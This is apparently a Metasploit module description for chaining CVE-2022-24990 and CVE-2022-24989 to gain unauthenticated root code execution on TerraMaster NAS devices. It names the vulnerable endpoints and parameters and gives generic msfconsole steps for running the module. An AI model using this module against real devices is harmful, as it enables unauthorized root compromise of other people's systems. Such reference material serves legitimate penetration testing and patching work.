This module exploits an unauthenticated remote code execution vulnerability in TerraMaster TOS 4.2.29
and lower by chaining two existing vulnerabilities, CVE-2022-24990 "Leaking sensitive information"
and CVE-2022-24989, "Authenticated remote code execution".
Exploiting vulnerable endpoint `api.php?mobile/webNasIPS` leaking sensitive information such as admin password
hash and mac address, the attacker can achieve unauthenticated access and use another vulnerable endpoint
`api.php?mobile/createRaid` with POST parameters `raidtype` and `diskstring` to execute remote code as root
on TerraMaster NAS devices.
msf > use exploit/linux/http/terramaster_unauth_rce_cve_2022_24990
msf exploit(terramaster_unauth_rce_cve_2022_24990) > show targets
...targets...
msf exploit(terramaster_unauth_rce_cve_2022_24990) > set TARGET < target-id >
msf exploit(terramaster_unauth_rce_cve_2022_24990) > show options
...show and set options...
msf exploit(terramaster_unauth_rce_cve_2022_24990) > exploit